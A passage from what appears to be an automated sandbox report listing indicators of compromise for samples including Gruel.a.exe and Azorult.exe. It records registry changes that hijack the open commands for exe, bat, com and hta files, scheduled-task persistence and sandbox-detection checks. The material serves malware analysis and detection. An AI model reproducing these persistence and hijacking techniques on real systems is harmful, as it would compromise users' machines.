\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language icacls.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language icacls.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language icacls.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language net1.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language icacls.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language sc.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language netsh.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language icacls.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language netsh.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language sc.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language Rundll32.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language netsh.exe -
Checks processor information in registry 2 TTPs 64 IoCs
Processor information is often read in order to detect sandboxing environments.
description ioc Process Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 firefox.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~Mhz firefox.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 firefox.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 msedge.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 firefox.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\VendorIdentifier msedge.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~Mhz firefox.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 firefox.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~Mhz firefox.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 firefox.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 firefox.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 firefox.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 firefox.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~Mhz firefox.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString firefox.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~Mhz firefox.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 firefox.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\VendorIdentifier chrome.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 firefox.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 firefox.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~Mhz firefox.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~Mhz firefox.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~Mhz firefox.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~Mhz firefox.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~Mhz firefox.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 firefox.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 firefox.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 firefox.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~Mhz firefox.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 firefox.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 firefox.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~Mhz firefox.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 firefox.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 firefox.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 firefox.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~Mhz firefox.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 firefox.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 firefox.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 firefox.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 firefox.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 firefox.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~Mhz firefox.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 firefox.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~Mhz firefox.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\VendorIdentifier firefox.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~Mhz firefox.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 firefox.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 firefox.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Signature firefox.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~Mhz firefox.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 firefox.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~Mhz firefox.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~Mhz firefox.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 firefox.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~Mhz firefox.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~Mhz firefox.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 firefox.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~Mhz firefox.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 firefox.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~Mhz firefox.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~Mhz firefox.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~Mhz firefox.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 chrome.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 winit.exe -
Delays execution with timeout.exe 7 IoCs
pid Process 7012 timeout.exe 6700 timeout.exe 3884 timeout.exe 1376 timeout.exe 600 timeout.exe 1152 timeout.exe 8148 timeout.exe -
Enumerates system info in registry 2 TTPs 6 IoCs
description ioc Process Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS msedge.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName msedge.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer msedge.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS chrome.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName chrome.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer chrome.exe -
Gathers network information 2 TTPs 1 IoCs
Uses commandline utility to view network configuration.
pid Process 188 ipconfig.exe -
Kills process with taskkill 5 IoCs
pid Process 2708 taskkill.exe 7408 taskkill.exe 7796 taskkill.exe 2880 taskkill.exe 7816 taskkill.exe -
description ioc Process Key created \REGISTRY\USER\S-1-5-21-3174447216-2582055397-1659630574-1000\Software\Microsoft\Internet Explorer\Recovery\AdminActive iexplore.exe Key created \REGISTRY\USER\S-1-5-21-3174447216-2582055397-1659630574-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch iexplore.exe Key created \REGISTRY\USER\S-1-5-21-3174447216-2582055397-1659630574-1000\Software\Microsoft\Internet Explorer\GPU IEXPLORE.EXE Set value (int) \REGISTRY\USER\S-1-5-21-3174447216-2582055397-1659630574-1000\SOFTWARE\Microsoft\Internet Explorer\Main\CompatibilityFlags = "0" iexplore.exe Key created \REGISTRY\USER\S-1-5-21-3174447216-2582055397-1659630574-1000\Software\Microsoft\Internet Explorer\Main IEXPLORE.EXE Key created \REGISTRY\USER\S-1-5-21-3174447216-2582055397-1659630574-1000\Software\Microsoft\Internet Explorer\Recovery\PendingRecovery iexplore.exe Set value (str) \REGISTRY\USER\S-1-5-21-3174447216-2582055397-1659630574-1000\SOFTWARE\Microsoft\Internet Explorer\Main\WindowsSearch\Version = "WS not running" IEXPLORE.EXE Set value (str) \REGISTRY\USER\S-1-5-21-3174447216-2582055397-1659630574-1000\SOFTWARE\Microsoft\Internet Explorer\Main\Window Title = "kIlLeRgUaTe 1.03, I mAke ThIs vIrUs BeCaUsE I dOn'T hAvE NoThInG tO dO!!" Gruel.a.exe Key created \REGISTRY\USER\S-1-5-21-3174447216-2582055397-1659630574-1000\Software\Microsoft\Internet Explorer\Main iexplore.exe Set value (str) \REGISTRY\USER\S-1-5-21-3174447216-2582055397-1659630574-1000\SOFTWARE\Microsoft\Internet Explorer\GPU\AdapterInfo = "vendorId=\"0x10de\",deviceID=\"0x8c\",subSysID=\"0x0\",revision=\"0x0\",version=\"10.0.19041.4355\"hypervisor=\"No Hypervisor (No SLAT)\"" IEXPLORE.EXE Set value (str) \REGISTRY\USER\S-1-5-21-3174447216-2582055397-1659630574-1000\SOFTWARE\Microsoft\Internet Explorer\Main\FullScreen = "no" iexplore.exe Set value (int) \REGISTRY\USER\S-1-5-21-3174447216-2582055397-1659630574-1000\SOFTWARE\Microsoft\Internet Explorer\Recovery\PendingRecovery\AdminActive = "0" iexplore.exe Key created \REGISTRY\USER\S-1-5-21-3174447216-2582055397-1659630574-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch IEXPLORE.EXE Set value (int) \REGISTRY\USER\S-1-5-21-3174447216-2582055397-1659630574-1000\SOFTWARE\Microsoft\Internet Explorer\Recovery\AdminActive\{81089055-0E30-11F0-816F-C2CD0B28EBC8} = "0" iexplore.exe Set value (str) \REGISTRY\USER\S-1-5-21-3174447216-2582055397-1659630574-1000\SOFTWARE\Microsoft\Internet Explorer\Main\WindowsSearch\Version = "WS not running" iexplore.exe Key created \REGISTRY\USER\S-1-5-21-3174447216-2582055397-1659630574-1000\Software\Microsoft\Internet Explorer\IESettingSync IEXPLORE.EXE Set value (int) \REGISTRY\USER\S-1-5-21-3174447216-2582055397-1659630574-1000\SOFTWARE\Microsoft\Internet Explorer\IESettingSync\SlowSettingTypesChanged = "2" IEXPLORE.EXE -
Modifies data under HKEY_USERS 3 IoCs
description ioc Process Key created \REGISTRY\USER\S-1-5-19\Software\Microsoft\Cryptography\TPM\Telemetry chrome.exe Set value (int) \REGISTRY\USER\S-1-5-19\SOFTWARE\Microsoft\Cryptography\TPM\Telemetry\TraceTimeLast = "133878995296853409" chrome.exe Key created \REGISTRY\USER\S-1-5-19\Software\Microsoft\Cryptography\TPM\Telemetry msedge.exe -
Modifies registry class 51 IoCs
description ioc Process Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\piffile\shell\open\command\ = "\"C:\\Users\\Admin\\Downloads\\Gruel.a.exe\" %1" Gruel.a.exe Key created \REGISTRY\USER\S-1-5-21-3174447216-2582055397-1659630574-1000_Classes\Local Settings chrome.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\MIME\Database\Codepage winit.exe Key created \REGISTRY\USER\S-1-5-21-3174447216-2582055397-1659630574-1000_Classes\Local Settings OpenWith.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{8C6D8BD6-116B-4D4E-B1C2-87098DB509BB}\InProcServer32 Gruel.a.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node Gruel.a.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{8C6D8BD6-116B-4D4E-B1C2-87098DB509BB}\Shell\Open Gruel.a.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{8C6D8BD6-116B-4D4E-B1C2-87098DB509BB}\DefaultIcon\ = "C:\\Users\\Admin\\Downloads\\Gruel.a.exe,0" Gruel.a.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{8C6D8BD6-116B-4D4E-B1C2-87098DB509BB}\Shell\Open\Command\ = "\"C:\\Users\\Admin\\Downloads\\Gruel.a.exe\" %1" Gruel.a.exe Key created \REGISTRY\USER\S-1-5-21-3174447216-2582055397-1659630574-1000_Classes\Local Settings firefox.exe Key created \REGISTRY\USER\S-1-5-21-3174447216-2582055397-1659630574-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Mappings\S-1-15-2-620072444-2846605723-1118207114-1642104096-81213792-2370344205-2712285428 chrome.exe Key created \REGISTRY\USER\S-1-5-21-3174447216-2582055397-1659630574-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Mappings\S-1-15-2-620072444-2846605723-1118207114-1642104096-81213792-2370344205-2712285428\Children chrome.exe Key created \REGISTRY\USER\S-1-5-21-3174447216-2582055397-1659630574-1000_Classes\Local Settings wini.exe Key created \REGISTRY\USER\S-1-5-21-3174447216-2582055397-1659630574-1000_Classes\Local Settings cmd.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\comfile\shell\open\command\ = "\"C:\\Users\\Admin\\Downloads\\Gruel.a.exe\" %1" Gruel.a.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\batfile\shell\open\command\ = "\"C:\\Users\\Admin\\Downloads\\Gruel.a.exe\" %1" Gruel.a.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{8C6D8BD6-116B-4D4E-B1C2-87098DB509BB}\Shell\Open\Command\ = "\"C:\\\\Rundll32.exe\" %1" Rundll32.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{8C6D8BD6-116B-4D4E-B1C2-87098DB509BB}\DefaultIcon\ = "C:\\\\Rundll32.exe,0" Rundll32.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{8C6D8BD6-116B-4D4E-B1C2-87098DB509BB}\DefaultIcon\ = "C:\\\\Rundll32.exe,0" Rundll32.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{8C6D8BD6-116B-4D4E-B1C2-87098DB509BB}\Shell\Open\Command\ = "\"C:\\\\Rundll32.exe\" %1" Rundll32.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{8C6D8BD6-116B-4D4E-B1C2-87098DB509BB}\DefaultIcon\ = "C:\\Users\\Admin\\Downloads\\Gruel.a.exe,0" Gruel.a.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{8C6D8BD6-116B-4D4E-B1C2-87098DB509BB}\Shell\Open\Command\ = "\"C:\\Users\\Admin\\Downloads\\Gruel.a.exe\" %1" Gruel.a.exe Key created \REGISTRY\MACHINE\Software\Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\Deployment\Package\*\S-1-5-21-3174447216-2582055397-1659630574-1000\{A4D79643-4284-48E7-A75A-C47F8B21E27E} msedge.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{8C6D8BD6-116B-4D4E-B1C2-87098DB509BB}\Shell Gruel.a.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{8C6D8BD6-116B-4D4E-B1C2-87098DB509BB}\ShellEx Gruel.a.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{8C6D8BD6-116B-4D4E-B1C2-87098DB509BB}\InProcServer32\ = "Shell32.dll" Gruel.a.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{8C6D8BD6-116B-4D4E-B1C2-87098DB509BB}\Shell\Open\Command\ = "\"C:\\Users\\Admin\\Downloads\\Gruel.a.exe\" %1" Gruel.a.exe Key created \REGISTRY\USER\S-1-5-21-3174447216-2582055397-1659630574-1000_Classes\Local Settings R8.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{8C6D8BD6-116B-4D4E-B1C2-87098DB509BB} Gruel.a.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{8C6D8BD6-116B-4D4E-B1C2-87098DB509BB}\ShellEx\PropertySheetHandlers\{8C6D8BD6-116B-4D4E-B1C2-87098DB509BB} Gruel.a.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{8C6D8BD6-116B-4D4E-B1C2-87098DB509BB}\InProcServer32\ThreadingModel = "Apartment" Gruel.a.exe Set value (data) \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{8C6D8BD6-116B-4D4E-B1C2-87098DB509BB}\ShellFolder\Attributes = 00000000 Gruel.a.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\exefile\shell\open\command\ = "\"C:\\Users\\Admin\\Downloads\\Gruel.a.exe\" %1" Gruel.a.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\htafile\Shell\Open\Command\ = "\"C:\\Users\\Admin\\Downloads\\Gruel.a.exe\" %1" Gruel.a.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{8C6D8BD6-116B-4D4E-B1C2-87098DB509BB}\Shell\Open\Command\ = "\"C:\\\\Rundll32.exe\" %1" Rundll32.exe Key created \REGISTRY\USER\S-1-5-21-3174447216-2582055397-1659630574-1000_Classes\Local Settings OpenWith.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{8C6D8BD6-116B-4D4E-B1C2-87098DB509BB}\ = "kIlLeRgUaTe 1.03" Gruel.a.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{8C6D8BD6-116B-4D4E-B1C2-87098DB509BB}\DefaultIcon\ = "C:\\\\Rundll32.exe,0" Rundll32.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{8C6D8BD6-116B-4D4E-B1C2-87098DB509BB}\DefaultIcon\ = "C:\\Users\\Admin\\Downloads\\Gruel.a.exe,0" Gruel.a.exe Key created \REGISTRY\USER\S-1-5-21-3174447216-2582055397-1659630574-1000_Classes\Local Settings firefox.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\MIME\Database winit.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\MIME\Database\Charset winit.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID Gruel.a.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{8C6D8BD6-116B-4D4E-B1C2-87098DB509BB}\ShellFolder Gruel.a.exe Set value (str) \REGISTRY\USER\S-1-5-21-3174447216-2582055397-1659630574-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Mappings\S-1-15-2-620072444-2846605723-1118207114-1642104096-81213792-2370344205-2712285428\DisplayName = "Chrome Sandbox" chrome.exe Set value (str) \REGISTRY\USER\S-1-5-21-3174447216-2582055397-1659630574-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Mappings\S-1-15-2-620072444-2846605723-1118207114-1642104096-81213792-2370344205-2712285428\Moniker = "cr.sb.odm3E4D1A088C1F6D498C84F3C86DE73CE49F82A104" chrome.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{8C6D8BD6-116B-4D4E-B1C2-87098DB509BB}\DefaultIcon Gruel.a.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{8C6D8BD6-116B-4D4E-B1C2-87098DB509BB}\Shell\Open\Command Gruel.a.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{8C6D8BD6-116B-4D4E-B1C2-87098DB509BB}\ShellEx\PropertySheetHandlers Gruel.a.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{8C6D8BD6-116B-4D4E-B1C2-87098DB509BB}\InfoTip = "kIlLeRgUaTe 1.03" Gruel.a.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\exefile\shell\runas\command\ = "\"C:\\Users\\Admin\\Downloads\\Gruel.a.exe\" %1" Gruel.a.exe -
NTFS ADS 1 IoCs
description ioc Process File opened for modification C:\ProgramData\Microsoft\Intel\winmgmts:\localhost\root\CIMV2 taskhostw.exe -
Runs .reg file with regedit 2 IoCs
pid Process 2492 regedit.exe 2044 regedit.exe -
Runs net.exe
-
Scheduled Task/Job: Scheduled Task 1 TTPs 4 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
pid Process 7832 schtasks.exe 3756 schtasks.exe 2012 schtasks.exe 4944 schtasks.exe -
Suspicious behavior: EnumeratesProcesses 64 IoCs
pid Process 7096 chrome.exe 7096 chrome.exe 7096 chrome.exe 7096 chrome.exe 3636 chrome.exe 3636 chrome.exe 6848 Azorult.exe 6848 Azorult.exe 6848 Azorult.exe 6848 Azorult.exe 6848 Azorult.exe 6848 Azorult.exe 6848 Azorult.exe 6848 Azorult.exe 6848 Azorult.exe 6848 Azorult.exe 824 rutserv.exe 824 rutserv.exe 824 rutserv.exe 824 rutserv.exe 824 rutserv.exe 824 rutserv.exe 4536 rutserv.exe 4536 rutserv.exe 3544 rutserv.exe 3544 rutserv.exe 7136 rutserv.exe 7136 rutserv.exe 7136 rutserv.exe 7136 rutserv.exe 7136 rutserv.exe 7136 rutserv.exe 6912 rfusclient.exe 6912 rfusclient.exe 3556 winit.exe 3556 winit.exe 3556 winit.exe 3556 winit.exe 3556 winit.exe 3556 winit.exe 3556 winit.exe 3556 winit.exe 3556 winit.exe 3556 winit.exe 3556 winit.exe 3556 winit.exe 3556 winit.exe 3556 winit.exe 3556 winit.exe 3556 winit.exe 3556 winit.exe 3556 winit.exe 3556 winit.exe 3556 winit.exe 3556 winit.exe 3556 winit.exe 3556 winit.exe 3556 winit.exe 3556 winit.exe 3556 winit.exe 3556 winit.exe 3556 winit.exe 3556 winit.exe 3556 winit.exe -
Suspicious behavior: GetForegroundWindowSpam 2 IoCs
pid Process 7096 chrome.exe 5984 taskhostw.exe -
Suspicious behavior: LoadsDriver 3 IoCs
pid Process 680 Process not Found 680 Process not Found 680 Process not Found -
Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary 11 IoCs
pid Process 7096 chrome.exe 7096 chrome.exe 7096 chrome.exe 7096 chrome.exe 7096 chrome.exe 6708 msedge.exe 6708 msedge.exe 6708 msedge.exe 6708 msedge.exe 6708 msedge.exe 6708 msedge.exe -
Suspicious behavior: SetClipboardViewer 1 IoCs
pid Process 8132 rfusclient.exe -
Suspicious use of AdjustPrivilegeToken 64 IoCs
description pid Process Token: SeDebugPrivilege 2472 firefox.exe Token: SeDebugPrivilege 2472 firefox.exe Token: SeShutdownPrivilege 7096 chrome.exe Token: SeCreatePagefilePrivilege 7096 chrome.exe Token: SeShutdownPrivilege 7096 chrome.exe Token: SeCreatePagefilePrivilege 7096 chrome.exe Token: SeShutdownPrivilege 7096 chrome.exe Token: SeCreatePagefilePrivilege 7096 chrome.exe Token: SeShutdownPrivilege 7096 chrome.exe Token: SeCreatePagefilePrivilege 7096 chrome.exe Token: SeShutdownPrivilege 7096 chrome.exe Token: SeCreatePagefilePrivilege 7096 chrome.exe Token: SeShutdownPrivilege 7096 chrome.exe Token: SeCreatePagefilePrivilege 7096 chrome.exe Token: SeShutdownPrivilege 7096 chrome.exe Token: SeCreatePagefilePrivilege 7096 chrome.exe Token: SeShutdownPrivilege 7096 chrome.exe Token: SeCreatePagefilePrivilege 7096 chrome.exe Token: SeShutdownPrivilege 7096 chrome.exe Token: SeCreatePagefilePrivilege 7096 chrome.exe Token: SeShutdownPrivilege 7096 chrome.exe Token: SeCreatePagefilePrivilege 7096 chrome.exe Token: SeShutdownPrivilege 7096 chrome.exe Token: SeCreatePagefilePrivilege 7096 chrome.exe Token: SeShutdownPrivilege 7096 chrome.exe Token: SeCreatePagefilePrivilege 7096 chrome.exe Token: SeShutdownPrivilege 7096 chrome.exe Token: SeCreatePagefilePrivilege 7096 chrome.exe Token: SeShutdownPrivilege 7096 chrome.exe Token: SeCreatePagefilePrivilege 7096 chrome.exe Token: SeShutdownPrivilege 7096 chrome.exe Token: SeCreatePagefilePrivilege 7096 chrome.exe Token: SeShutdownPrivilege 7096 chrome.exe Token: SeCreatePagefilePrivilege 7096 chrome.exe Token: SeShutdownPrivilege 7096 chrome.exe Token: SeCreatePagefilePrivilege 7096 chrome.exe Token: SeShutdownPrivilege 7096 chrome.exe Token: SeCreatePagefilePrivilege 7096 chrome.exe Token: SeShutdownPrivilege 7096 chrome.exe Token: SeCreatePagefilePrivilege 7096 chrome.exe Token: SeShutdownPrivilege 7096 chrome.exe Token: SeCreatePagefilePrivilege 7096 chrome.exe Token: SeShutdownPrivilege 7096 chrome.exe Token: SeCreatePagefilePrivilege 7096 chrome.exe Token: SeShutdownPrivilege 7096 chrome.exe Token: SeCreatePagefilePrivilege 7096 chrome.exe Token: SeShutdownPrivilege 7096 chrome.exe Token: SeCreatePagefilePrivilege 7096 chrome.exe Token: SeShutdownPrivilege 7096 chrome.exe Token: SeCreatePagefilePrivilege 7096 chrome.exe Token: SeShutdownPrivilege 7096 chrome.exe Token: SeCreatePagefilePrivilege 7096 chrome.exe Token: SeShutdownPrivilege 7096 chrome.exe Token: SeCreatePagefilePrivilege 7096 chrome.exe Token: SeShutdownPrivilege 7096 chrome.exe Token: SeCreatePagefilePrivilege 7096 chrome.exe Token: SeShutdownPrivilege 7096 chrome.exe Token: SeCreatePagefilePrivilege 7096 chrome.exe Token: SeShutdownPrivilege 7096 chrome.exe Token: SeCreatePagefilePrivilege 7096 chrome.exe Token: SeShutdownPrivilege 7096 chrome.exe Token: SeCreatePagefilePrivilege 7096 chrome.exe Token: SeShutdownPrivilege 7096 chrome.exe Token: SeCreatePagefilePrivilege 7096 chrome.exe -
Suspicious use of FindShellTrayWindow 64 IoCs
